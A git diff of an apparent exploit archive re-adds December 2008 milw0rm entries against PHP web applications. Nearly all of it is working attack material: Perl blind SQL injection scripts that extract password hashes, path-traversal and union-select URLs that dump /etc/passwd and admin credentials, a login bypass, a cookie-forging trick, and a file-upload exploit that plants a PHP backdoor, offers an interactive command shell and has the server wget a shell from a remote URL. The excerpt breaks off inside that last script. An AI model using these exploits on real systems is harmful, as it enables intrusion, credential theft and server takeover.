+use strict;
+use Digest::MD5('md5_hex');
+use LWP::UserAgent;
+
+
+my $field = "user_password";
+my ($stop,$start,$hash);
+
+
+my $domain = shift;
+my $ptable = shift;
+my $ulogin = shift;
+my $plogin = shift;
+my $userid = shift or &usage;
+
+my @chars = (48..57, 97..102); 
+my $substr = 1; 
+my $http = new LWP::UserAgent;
+
+
+
+sub send_request
+{ 
+     my $post = undef;
+     my $host = $domain;
+     my $param = shift @_ or die $!;
+  
+     $host  .= "/submit.php?stype=l";
+
+     $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
+     $post = $http->post('http://'.$host,[
+                                 'link_category'    => 1,
+                                 'link_name'        => 1,
+                                 'link_url'         => 1,
+                                 'link_description' => 1,
+                                 'submit_link'      => 'Submit+Link',
+                                 'submit_info[pwn]' => $param,
+                               ]);
+ 
+}
+
+
+sub give_char
+{
+     my $send = undef;
+     my ($charz,$uidz) = @_;
+  
+     $send = "' or (select if((ascii(substring".
+             "($field,$uidz,1))=$charz),".
+             "benchmark(230000000,char(0)),".
+            "0) from ${ptable}_users where user_id=$userid))#";
+
+     return $send;
+}
+
+
+for(1..32) 
+{
+     foreach my $set(@chars)
+     {
+          my $start = time();
+    
+          send_request(give_char($set,$substr));
+    
+          my $stop = time();
+  
+         if($stop - $start > 6)
+         { 
+              syswrite(STDOUT,chr($set));
+              $substr++; 
+              last;
+        }
+    }
+}
+
+sub usage
+{
+      print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
+      print "by athos - staker[at]hotmail[dot]it\n";
+      print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
+      print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; 
+      exit; 
+}     
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7579.txt b/platforms/php/webapps/7579.txt
index 9285121b7..cb8749ac3 100755
--- a/platforms/php/webapps/7579.txt
+++ b/platforms/php/webapps/7579.txt
@@ -1,25 +1,25 @@
-ClaSS
-http://www.laex.org/class/
-
-
-- <=0.8.60 -
-magic_quotes_gpc = Off
-register_globals = On
-
-
-- File Disclosure/Download -
-http://site/Class/class/scripts/export.php?ftype=
-/../../path/to/Class/school.php
-/../../path/to/Class/dbh_connect.php
-/../../etc/passwd
-
-
-- Timeline -
-Author notified: Dec 19
-Patch 0.8.61: Dec 19
-
-
-- Seasons Greetings -
-- http://nukeit.org -
-
-# milw0rm.com [2008-12-24]
+ClaSS
+http://www.laex.org/class/
+
+
+- <=0.8.60 -
+magic_quotes_gpc = Off
+register_globals = On
+
+
+- File Disclosure/Download -
+http://site/Class/class/scripts/export.php?ftype=
+/../../path/to/Class/school.php
+/../../path/to/Class/dbh_connect.php
+/../../etc/passwd
+
+
+- Timeline -
+Author notified: Dec 19
+Patch 0.8.61: Dec 19
+
+
+- Seasons Greetings -
+- http://nukeit.org -
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7580.txt b/platforms/php/webapps/7580.txt
index e33ba3e0e..f61cb89df 100755
--- a/platforms/php/webapps/7580.txt
+++ b/platforms/php/webapps/7580.txt
@@ -1,17 +1,17 @@
-BloofoxCMS 0.3.4
-http://www.bloofox.com/
-
-magic_quotes_gpc = Off
-register_globals = On
-
-- File Inclusion -
-http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
-
-Also vulnerable:
-dialog.php?theme=
-dialog.php?dialog=foo&module=
-
-- Seasons Greetings -
-- http://nukeit.org -
-
-# milw0rm.com [2008-12-24]
+BloofoxCMS 0.3.4
+http://www.bloofox.com/
+
+magic_quotes_gpc = Off
+register_globals = On
+
+- File Inclusion -
+http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
+
+Also vulnerable:
+dialog.php?theme=
+dialog.php?dialog=foo&module=
+
+- Seasons Greetings -
+- http://nukeit.org -
+
+# milw0rm.com [2008-12-24]
diff --git a/platforms/php/webapps/7586.txt b/platforms/php/webapps/7586.txt
index f5efea65c..7f4814aa3 100755
--- a/platforms/php/webapps/7586.txt
+++ b/platforms/php/webapps/7586.txt
@@ -1,19 +1,19 @@
-##############################################################################
-# Miniweb 2.0 Admin bypass
-##############################################################################
-# Type:
-# 'union select 1#
-# in the username field and press login, you are admin!
-#
-# download: http://www.miniweb2.com/
-##############################################################################
-# Found by bizzit
-#
-# Contact: bizzit[at]live.de
-##############################################################################
-# Greetz to:
-# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x,
-# Nazrek, Free-Hack and Sys-Flaw
-##############################################################################
-
-# milw0rm.com [2008-12-28]
+##############################################################################
+# Miniweb 2.0 Admin bypass
+##############################################################################
+# Type:
+# 'union select 1#
+# in the username field and press login, you are admin!
+#
+# download: http://www.miniweb2.com/
+##############################################################################
+# Found by bizzit
+#
+# Contact: bizzit[at]live.de
+##############################################################################
+# Greetz to:
+# Suicide, ReED, h0yt3r, J0hn^x3r, tmh, n00bor, Five-Three-Nine, electron1x,
+# Nazrek, Free-Hack and Sys-Flaw
+##############################################################################
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7593.pl b/platforms/php/webapps/7593.pl
index 0f41d72c5..27c2032ec 100755
--- a/platforms/php/webapps/7593.pl
+++ b/platforms/php/webapps/7593.pl
@@ -1,154 +1,154 @@
-#!/usr/bin/perl 
-# --------------------------------------------------
-# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
-# --------------------------------------------------
-# by athos - staker[at]hotmail[dot]it
-# download on http://deluxebb.com
-# --------------------------------------------------
-# Usage:
-# perl xpl.pl host/path prefix id password target id
-# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1
-# --------------------------------------------------
-# Note: magic_quotes_gpc off
-#       don't add me on msn messenger
-#       my email staker.38@gmail.com
-# --------------------------------------------------
-# Greetz: str0ke,The:Paradox and #cancer
-# --------------------------------------------------
-
-use strict;
-use Digest::MD5('md5_hex');
-use LWP::UserAgent;
-
-my ($hash,$http);
-my ($host,$prefix,$user,$pass,$target) = @ARGV;
-
-$http = new LWP::UserAgent(timeout => 5);
-
-if (@ARGV != 5)
-{
-      print "\n+----------------------------------------------------+\r",
-            "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r",
-            "\n+----------------------------------------------------+\r",
-            "\nby athos - staker[at]hotmail[dot]it\n",
-            "\nUsage     + perl $0 [host/path] [prefix] [ID] [password] [target ID]",
-            "\nHost      + localhost/DeluxeBB",
-            "\nID        + your user ID",
-            "\nPassword  + your password",
-            "\nPrefix    + table prefix (default: deluxebb)",
-            "\nTarget ID + target id\n";
-      exit;
-}      
-
-$http->default_header('Cookie' => cookies($user,$pass));
-
-&exploit;
-
-sub getUsername
-{
-      my ($user_id,$response,@nickname) = $_[0];
- 
-      $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id");
-      @nickname = $response->as_string =~ m{(.+?)}ig;
-      
-      return $nickname[1];
-}      
-
-
-
-sub cookies
-{
-      my ($username);
-      my ($user_id,$password) = @_;
-      
-      $username = getUsername($user_id);
-      $password = md5_hex($password);
-      
-      return qq{membercookie=$username; memberid=$user_id; memberpw=$password;};
-}      
-      
-      
-sub getMsg
-{
-      my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox");
-      
-      if ($response->as_string =~ m/pid=(\d+)./i)
-      {
-            return $1;
-      }
-      else
-      {
-            my $content = {
-                 to       => getUsername($user),
-                 subject  => rand(999),
-                 posticon => 'none',
-                 rte1     => rand(999),
-                 submit   => 'Send'
-
-            };  
-                            
-                            
-            my $request = $http->post("http://$host/pm.php?sub=newpm",$content);
-            my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox");
-            
-            if ($read_id->content =~ /pid=(\d+)./i)
-            {
-                  return $1;
-            }
-      }      
-}      
-    
-
-sub sql
-{
-      my ($i,$j,$sql) = (shift,shift,undef);
-      
-      $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),".
-             "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users".
-             "+WHERE uid=$target))%23";
-             
-      return $sql;        
-}        
-    
-
-sub delay
-{
-      my ($tm1,$tm2) = (undef,undef);
-      my ($msg,$sql) = @_;
-      
-      $tm1 = time();
-      
-      $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql");
-
-      $tm2 = time();
-      
-      return $tm2 - $tm1;
-}
-    
-    
-sub exploit
-{
-      my ($i,$ord) = (1,undef);
-      my @chr = (48..57, 97..102); 
-      
-      for ($i..32)
-      {
-            foreach $ord(@chr)
-            {
-                  if (delay(&getMsg,&sql($i,$ord)) >= 5)
-                  {
-                        syswrite(STDOUT,chr($ord)); $hash .= chr($ord);
-                        last;
-                        $i++;
-                  }      
-                  
-                  if ($i == 2 and not defined $hash)
-                  {
-                        syswrite(STDOUT,"Exploit Failed!\n");
-                        exit;
-                  }
-            } 
-      }                 
-}    
-
-# milw0rm.com [2008-12-28]
+#!/usr/bin/perl 
+# --------------------------------------------------
+# DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit
+# --------------------------------------------------
+# by athos - staker[at]hotmail[dot]it
+# download on http://deluxebb.com
+# --------------------------------------------------
+# Usage:
+# perl xpl.pl host/path prefix id password target id
+# perl xpl.pl localhost/deluxebb deluxebb 5 r00x 1
+# --------------------------------------------------
+# Note: magic_quotes_gpc off
+#       don't add me on msn messenger
+#       my email staker.38@gmail.com
+# --------------------------------------------------
+# Greetz: str0ke,The:Paradox and #cancer
+# --------------------------------------------------
+
+use strict;
+use Digest::MD5('md5_hex');
+use LWP::UserAgent;
+
+my ($hash,$http);
+my ($host,$prefix,$user,$pass,$target) = @ARGV;
+
+$http = new LWP::UserAgent(timeout => 5);
+
+if (@ARGV != 5)
+{
+      print "\n+----------------------------------------------------+\r",
+            "\n| DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit |\r",
+            "\n+----------------------------------------------------+\r",
+            "\nby athos - staker[at]hotmail[dot]it\n",
+            "\nUsage     + perl $0 [host/path] [prefix] [ID] [password] [target ID]",
+            "\nHost      + localhost/DeluxeBB",
+            "\nID        + your user ID",
+            "\nPassword  + your password",
+            "\nPrefix    + table prefix (default: deluxebb)",
+            "\nTarget ID + target id\n";
+      exit;
+}      
+
+$http->default_header('Cookie' => cookies($user,$pass));
+
+&exploit;
+
+sub getUsername
+{
+      my ($user_id,$response,@nickname) = $_[0];
+ 
+      $response = $http->get("http://$host/misc.php?sub=profile&uid=$user_id");
+      @nickname = $response->as_string =~ m{(.+?)}ig;
+      
+      return $nickname[1];
+}      
+
+
+
+sub cookies
+{
+      my ($username);
+      my ($user_id,$password) = @_;
+      
+      $username = getUsername($user_id);
+      $password = md5_hex($password);
+      
+      return qq{membercookie=$username; memberid=$user_id; memberpw=$password;};
+}      
+      
+      
+sub getMsg
+{
+      my $response = $http->get("http://$host/pm.php?sub=folder&name=inbox");
+      
+      if ($response->as_string =~ m/pid=(\d+)./i)
+      {
+            return $1;
+      }
+      else
+      {
+            my $content = {
+                 to       => getUsername($user),
+                 subject  => rand(999),
+                 posticon => 'none',
+                 rte1     => rand(999),
+                 submit   => 'Send'
+
+            };  
+                            
+                            
+            my $request = $http->post("http://$host/pm.php?sub=newpm",$content);
+            my $read_id = $http->get("http://$host/pm.php?sub=folder&name=inbox");
+            
+            if ($read_id->content =~ /pid=(\d+)./i)
+            {
+                  return $1;
+            }
+      }      
+}      
+    
+
+sub sql
+{
+      my ($i,$j,$sql) = (shift,shift,undef);
+      
+      $sql = "%27+OR+(SELECT+IF((ASCII(SUBSTRING(pass,$i,1))=$j),".
+             "benchmark(200000000,CHAR(0)),0)+FROM+${prefix}_users".
+             "+WHERE uid=$target))%23";
+             
+      return $sql;        
+}        
+    
+
+sub delay
+{
+      my ($tm1,$tm2) = (undef,undef);
+      my ($msg,$sql) = @_;
+      
+      $tm1 = time();
+      
+      $http->get("http://$host/pm.php?sub=do&submit=Delete&delete$msg=$sql");
+
+      $tm2 = time();
+      
+      return $tm2 - $tm1;
+}
+    
+    
+sub exploit
+{
+      my ($i,$ord) = (1,undef);
+      my @chr = (48..57, 97..102); 
+      
+      for ($i..32)
+      {
+            foreach $ord(@chr)
+            {
+                  if (delay(&getMsg,&sql($i,$ord)) >= 5)
+                  {
+                        syswrite(STDOUT,chr($ord)); $hash .= chr($ord);
+                        last;
+                        $i++;
+                  }      
+                  
+                  if ($i == 2 and not defined $hash)
+                  {
+                        syswrite(STDOUT,"Exploit Failed!\n");
+                        exit;
+                  }
+            } 
+      }                 
+}    
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7595.txt b/platforms/php/webapps/7595.txt
index 872ba61bb..541cc7b5a 100755
--- a/platforms/php/webapps/7595.txt
+++ b/platforms/php/webapps/7595.txt
@@ -1,19 +1,19 @@
-                                                                                             
-                                                                                                                    in the name of god
-
-                                                                                                          ..:: jj_nanak2000@yahoo.com ::.. 
-
-
-                                                                                                                      Tanx from : Expl0its 
-
-
-
-Script : FubarForum
-
-Version : 1.6
-
-Dork : "Powered by FubarForum v1.6"
-
-/forum/index.php?page=admin
-
-# milw0rm.com [2008-12-28]
+                                                                                             
+                                                                                                                    in the name of god
+
+                                                                                                          ..:: jj_nanak2000@yahoo.com ::.. 
+
+
+                                                                                                                      Tanx from : Expl0its 
+
+
+
+Script : FubarForum
+
+Version : 1.6
+
+Dork : "Powered by FubarForum v1.6"
+
+/forum/index.php?page=admin
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7596.txt b/platforms/php/webapps/7596.txt
index 3370b4674..ee493333b 100755
--- a/platforms/php/webapps/7596.txt
+++ b/platforms/php/webapps/7596.txt
@@ -1,26 +1,25 @@
-
---AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
-############################################
-Yazar(Auth0r): Bgh7
- 
-Site: Http://ozelteam.com Turk Bılısım Guclerı
- 
-PsT: ByBgh7 [at] msn [d0t] c0m
-############################################
-
---Script: http://www.alstrasoft.com/disposable-email-script.htm
- 
---Dork: AlstraSoft Web "ESE"
-
---Dork2: AlstraSoft Web Email Script Enterprise
- 
---Expl0it;
---http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
- 
-#########
-column_name
-Ä°d
-Passwd
-#########
-
-# milw0rm.com [2008-12-28]
+--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
+############################################
+Yazar(Auth0r): Bgh7
+ 
+Site: Http://ozelteam.com Turk Bılısım Guclerı
+ 
+PsT: ByBgh7 [at] msn [d0t] c0m
+############################################
+
+--Script: http://www.alstrasoft.com/disposable-email-script.htm
+ 
+--Dork: AlstraSoft Web "ESE"
+
+--Dork2: AlstraSoft Web Email Script Enterprise
+ 
+--Expl0it;
+--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
+ 
+#########
+column_name
+Ä°d
+Passwd
+#########
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7597.txt b/platforms/php/webapps/7597.txt
index 82d4511ee..b7148f6b7 100755
--- a/platforms/php/webapps/7597.txt
+++ b/platforms/php/webapps/7597.txt
@@ -1,48 +1,48 @@
-[START]
-
-####################################################################################################################
-[0x01] Informations:
-
-Script         : OwenPoll 1.0
-Download       : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1
-Vulnerability  : Insecure Cookie Handling
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-
-####################################################################################################################
-[0x02] Bug: [Insecure Cookie Handling]
-######
-
-Bugged file is: /[path]/checkloginmini.php
-
-[CODE]
-
-    if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){
-        // authentication was successful
-        // create session and set cookie with username
-        session_start();
-        $_SESSION['auth'] = 1;
-     
-        setcookie("username", $_POST['txtusername'], time()+(86400*30));
-
-[/CODE]
-
-If we log in correctly, a cookie is set with name "username" and as content the username name.
-
-[!] FIX: Set as content username's password.
-
-[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE]
-
-
-[!] EXPLOIT: javascript:document.cookie = "username=admin_username; path=/";
-             *admin_username is the nick of the administrator
-
-####################################################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-28]
+[START]
+
+####################################################################################################################
+[0x01] Informations:
+
+Script         : OwenPoll 1.0
+Download       : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1
+Vulnerability  : Insecure Cookie Handling
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+
+####################################################################################################################
+[0x02] Bug: [Insecure Cookie Handling]
+######
+
+Bugged file is: /[path]/checkloginmini.php
+
+[CODE]
+
+    if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){
+        // authentication was successful
+        // create session and set cookie with username
+        session_start();
+        $_SESSION['auth'] = 1;
+     
+        setcookie("username", $_POST['txtusername'], time()+(86400*30));
+
+[/CODE]
+
+If we log in correctly, a cookie is set with name "username" and as content the username name.
+
+[!] FIX: Set as content username's password.
+
+[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE]
+
+
+[!] EXPLOIT: javascript:document.cookie = "username=admin_username; path=/";
+             *admin_username is the nick of the administrator
+
+####################################################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7598.txt b/platforms/php/webapps/7598.txt
index e2e44f5e4..56f57e3ee 100755
--- a/platforms/php/webapps/7598.txt
+++ b/platforms/php/webapps/7598.txt
@@ -1,22 +1,22 @@
-#####################################################################################
-####              	PHP-Fusion Mod TI - Blog System Sql Injection                ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
-#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
-#####################################################################################
-#                                                                                   #
-#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
-#                                                                                   #
-#####################################################################################
-#                                      [Bug]                                        #
-#                                                                                   #
-#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-12-28]
+#####################################################################################
+####              	PHP-Fusion Mod TI - Blog System Sql Injection                ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
+#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
+#####################################################################################
+#                                                                                   #
+#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
+#                                                                                   #
+#####################################################################################
+#                                      [Bug]                                        #
+#                                                                                   #
+#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-12-28]
diff --git a/platforms/php/webapps/7600.pl b/platforms/php/webapps/7600.pl
index d5376c517..4a73969b7 100755
--- a/platforms/php/webapps/7600.pl
+++ b/platforms/php/webapps/7600.pl
@@ -1,215 +1,215 @@
-#!/usr/bin/perl
-
-# HAPPY CHRISTMAS !!
-# Flexphplink Pro
-# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1
-# Bug: Arbitrary File Upload
-# * I coded this exploit just for fun ;)
-# Exploit coded by Osirys
-# osirys[at]live[dot]it
-# http://osirys.org
-# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX
-
-# Example:
-# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/
-#   ============================
-#      Flexphplink Pro Exploit
-#       Coded by Osirys
-#       osirys[at]live[dot]it
-#       Proud to be italian
-#   ============================
-# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise:
-#     1 - Admin Details Disclosure
-#     2 - Arbitrary Command Execution
-#     3 - Shell upload
-#     4 - Exit
-# 1
-# [+] Extracting Admin Login Details .
-# [+] Done:
-#     Username: admin
-#     Password: adminz
-# osirys[~]>$
-
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-
-my $path   =  "/submitlink.php";
-my $u_path =  "/linkphoto/";
-my $l_file =  "back.php";
-
-my $code   =  "RCE backdoor

    \";if(!empty(\$_GET['cmd'])&&empty".
-              "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET".
-              "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )".
-              "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl".
-              "ude ('../const.inc.php');}echo \"Username: \$admin_username\";  echo".
-              "\"
    \";     echo   \"Password: \$admin_password\";   }          ?>";
-
-my $host   = $ARGV[0];
-
-($host) || help("-1");
-cheek($host) == 1 || help("-2");
-&banner;
-
-open  ($file, ">", $l_file);
-print  $file  "$code\n";
-close ($file);
-
-$dir = `pwd`;
-my $f_path = $dir."/".$l_file;
-$f_path =~ s/\n//;
-
-my $url  = $host.$path;
-my $ua   = LWP::UserAgent->new;
-$time = time();
-my $post = $ua->post($url,
-                      Content_Type => 'form-data',
-                      Content      => [
-                                         title    => 'abco',
-                                         url      => 'def',
-                                         userfile => [$f_path, '.php'],
-                                         addlink  => 'Add'
-                                      ]
-                    );
-
-if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) {
-    `rm -rf $f_path`;
-    cheek_fname($time);
-    ($rcefile) || die "[-] Unable to find phpscript uploaded\n";
-    &go;
-}
-else {
-    print "[-] Unable to upload evil php-code !\n";
-    exit(0);
-}
-
-sub go() {
-    my $error = $_[0];
-    if ($error == -1) {
-        print "[-] Bad Choice\n\n";
-    }
-    elsif ($error == -2) {
-        print "[-] Bad shell url\n\n";
-    }
-    print "[+] $host backdoored, just type your choise:\n".
-          "    1 - Admin Details Disclosure\n".
-          "    2 - Arbitrary Command Execution\n".
-          "    3 - Shell upload\n".
-          "    4 - Exit\n";
-
-    $choice = ;
-    $choice =~ /1|2|3|4/ || go("-1");
-    if ($choice == 1) {
-        &adm_disc;
-    }
-    elsif ($choice == 2) {
-        &exec_cmd;
-    }
-    elsif ($choice == 3) {
-        &shell_up;
-    }
-    elsif ($choice == 4) {
-        print "[-] Quitting ..\n";
-        exit(0);
-    }
-}
-
-sub adm_disc {
-    print "[+] Extracting Admin Login Details ..\n";
-    $exec_url = ($host.$u_path.$time.".php?adm=get");
-    $re = query($exec_url);
-    if ($re =~ /Username: <\/b>(.*)
    Password: <\/b>(.*)/) {
-        my($user,$pass) = ($1,$2);
-        print "[+] Done:          \n".
-              "    Username: $user\n".
-              "    Password: $pass\n";
-    }
-    else {
-        print "[-] Can't extract Admin Details.\n\n";
-        &go;
-    }
-} 
-
-sub exec_cmd {
-    print "shell\$>\n";
-    $cmd = ;
-    $cmd !~ /exit/ || die "[-] Quitting ..\n";
-    $exec_url = ($host.$u_path.$time.".php?cmd=".$cmd);
-    $re = query($exec_url);
-    if ($re =~ /CMD: <\/b>(.*)/) {
-        print "[*] $1\n";
-        &exec_cmd;
-    }
-    else {
-        print "[-] Undefined output or bad cmd !\n";
-        &exec_cmd;
-    }
-}
-
-sub shell_up {
-    print "[+] Type now a link for your .txt shell\n".
-          "    Shell name must be with .txt extension\n";
-    $s_link = ;
-    $s_link =~ /.*\/(.*)\.txt/ || &go("-2");
-    $s_name = $1;
-    $exec_url  = ($host.$u_path.$time.".php?cmd=wget ".$s_link);
-    $exec_url2 = ($host.$u_path.$time.".php?cmd=mv ".$s_name.".txt ".$s_name.".php");
-    query($exec_url); query($exec_url2);
-    print "[+] Your shell should be here: ".$host.$u_path.$s_name.".php\n";
-}
-
-sub cheek_fname() {
-    my $time = $_[0];
-    my $name = $time.".php";
-    $re = query($host.$u_path.$name);
-    if ($re =~ /RCE backdoor<\/b>/) {
-        $rcefile = $name;
-        return;
-    }
-}
-
-sub query() {
-    $link = $_[0];
-    my $req = HTTP::Request->new(GET => $link);
-    my $ua = LWP::UserAgent->new();
-    $ua->timeout(4);
-    my $response = $ua->request($req);
-    return $response->content;
-}
-
-sub cheek() {
-    my $host = $_[0];
-    if ($host =~ /http:\/\/(.*)/) {
-        return 1;
-    }
-    else {
-        return 0;
-    }
-}
-
-sub banner {
-    print "\n".
-          "  ============================ \n".
-          "     Flexphplink Pro Exploit   \n".
-          "      Coded by Osirys          \n".
-          "      osirys[at]live[dot]it    \n".
-          "      Proud to be italian      \n".
-          "  ============================ \n\n";
-}
-
-sub help() {
-    my $error = $_[0];
-    if ($error == -1) {
-        &banner;
-        print "\n[-] Cheek that you provide a hostname address!\n";
-    }
-    elsif ($error == -2) {
-        &banner;
-        print "\n[-] Bad hostname address !\n";
-    }
-    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
-    exit(0);
-}
-
-# milw0rm.com [2008-12-28]
+#!/usr/bin/perl
+
+# HAPPY CHRISTMAS !!
+# Flexphplink Pro
+# http://www.hotscripts.com/jump.php?listing_id=21062&jump_type=1
+# Bug: Arbitrary File Upload
+# * I coded this exploit just for fun ;)
+# Exploit coded by Osirys
+# osirys[at]live[dot]it
+# http://osirys.org
+# Greets: x0r, miclen, emgent, str0ke, Todd and AlpHaNiX
+
+# Example:
+# osirys[~]>$ perl exp.txt http://localhost/flexphplinkproen/
+#   ============================
+#      Flexphplink Pro Exploit
+#       Coded by Osirys
+#       osirys[at]live[dot]it
+#       Proud to be italian
+#   ============================
+# [+] http://localhost/flexphplinkproen/ backdoored, just type your choise:
+#     1 - Admin Details Disclosure
+#     2 - Arbitrary Command Execution
+#     3 - Shell upload
+#     4 - Exit
+# 1
+# [+] Extracting Admin Login Details .
+# [+] Done:
+#     Username: admin
+#     Password: adminz
+# osirys[~]>$
+
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+
+my $path   =  "/submitlink.php";
+my $u_path =  "/linkphoto/";
+my $l_file =  "back.php";
+
+my $code   =  "RCE backdoor

    \";if(!empty(\$_GET['cmd'])&&empty".
+              "(\$_GET['adm'])){echo\"CMD: \";system(\$_GET['cmd']);}elseif((\$_GET".
+              "['adm']==\"get\")&&empty(\$_GET['cmd'])){if(is_file(\"../const.inc.php3\" )".
+              "){include('../const.inc.php3');}elseif(is_file(\"../const.inc.php\")){ incl".
+              "ude ('../const.inc.php');}echo \"Username: \$admin_username\";  echo".
+              "\"
    \";     echo   \"Password: \$admin_password\";   }          ?>";
+
+my $host   = $ARGV[0];
+
+($host) || help("-1");
+cheek($host) == 1 || help("-2");
+&banner;
+
+open  ($file, ">", $l_file);
+print  $file  "$code\n";
+close ($file);
+
+$dir = `pwd`;
+my $f_path = $dir."/".$l_file;
+$f_path =~ s/\n//;
+
+my $url  = $host.$path;
+my $ua   = LWP::UserAgent->new;
+$time = time();
+my $post = $ua->post($url,
+                      Content_Type => 'form-data',
+                      Content      => [
+                                         title    => 'abco',
+                                         url      => 'def',
+                                         userfile => [$f_path, '.php'],
+                                         addlink  => 'Add'
+                                      ]
+                    );
+
+if (($post->is_success)&&($post->as_string=~ /Thank you for your submission/)) {
+    `rm -rf $f_path`;
+    cheek_fname($time);
+    ($rcefile) || die "[-] Unable to find phpscript uploaded\n";
+    &go;
+}
+else {
+    print "[-] Unable to upload evil php-code !\n";
+    exit(0);
+}
+
+sub go() {
+    my $error = $_[0];
+    if ($error == -1) {
+        print "[-] Bad Choice\n\n";
+    }
+    elsif ($error == -2) {
+        print "[-] Bad shell url\n\n";
+    }
+    print "[+] $host backdoored, just type your choise:\n".
+          "    1 - Admin Details Disclosure\n".
+          "    2 - Arbitrary Command Execution\n".
+          "    3 - Shell upload\n".
+          "    4 - Exit\n";
+
+    $choice = ;
+    $choice =~ /1|2|3|4/ || go("-1");
+    if ($choice == 1) {
+        &adm_disc;
+    }
+    elsif ($choice == 2) {
+        &exec_cmd;
+    }
+    elsif ($choice == 3) {
+        &shell_up;
+    }
+    elsif ($choice == 4) {
+        print "[-] Quitting ..\n";
+        exit(0);
+    }
+}
+
+sub adm_disc {
+    print "[+] Extracting Admin Login Details ..\n";
+    $exec_url = ($host.$u_path.$time.".php?adm=get");
+    $re = query($exec_url);
+    if ($re =~ /Username: <\/b>(.*)
    Password: <\/b>(.*)/) {
+        my($user,$pass) = ($1,$2);
+        print "[+] Done:          \n".
+              "    Username: $user\n".
+              "    Password: $pass\n";
+    }
+    else {
+        print "[-] Can't extract Admin Details.\n\n";
+        &go;
+    }
+} 
+
+sub exec_cmd {
+    print "shell\$>\n";
